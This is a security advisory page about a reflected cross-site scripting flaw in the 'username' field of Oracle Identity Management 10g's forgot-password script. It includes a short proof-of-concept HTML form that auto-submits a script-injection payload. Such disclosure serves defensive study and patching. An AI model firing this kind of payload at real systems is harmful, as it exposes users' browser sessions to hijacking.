Oracle Identity Management 10g XSS Vulnerability

Risk: Low
Local: No
Remote: Yes

<!-- Oracle Identity Management 10g (username) XSS POST Injection Vulnerability Vendor: Oracle Corporation Product web page: Affected version: 10g ( Summary: Oracle Identity Management enables organizations to effectively manage the end-to-end lifecycle of user identities across all enterprise resources, both within and beyond the firewall and into the cloud. The Oracle Identity Management platform delivers scalable solutions for identity governance, access management and directory services. This modern platform helps organizations strengthen security, simplify compliance and capture business opportunities around mobile and social access. Desc: Oracle Identity Management suffers from a reflected XSS POST Injection vulnerability when parsing user input to the 'username' parameter via POST method thru '/usermanagement/forgotpassword/index.jsp' script. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user's browser session. Tested on: Oracle Application Server 10g httpd Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2012-5110 Advisory URL: 25.09.2012 --> <html> <head> <title>Oracle Identity Management 10g (username) XSS POST Injection Vulnerability</title> </head> <body> <form name="XSS" method="POST" action=""> <input type="hidden" name="btnSubmit" value="SUBMIT" /> <input type="hidden" name="username" value='"><script>alert(1);</script>' /> </form> <script type="text/javascript"> document.XSS.submit(); </script> </body> </html>


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022,


Back to Top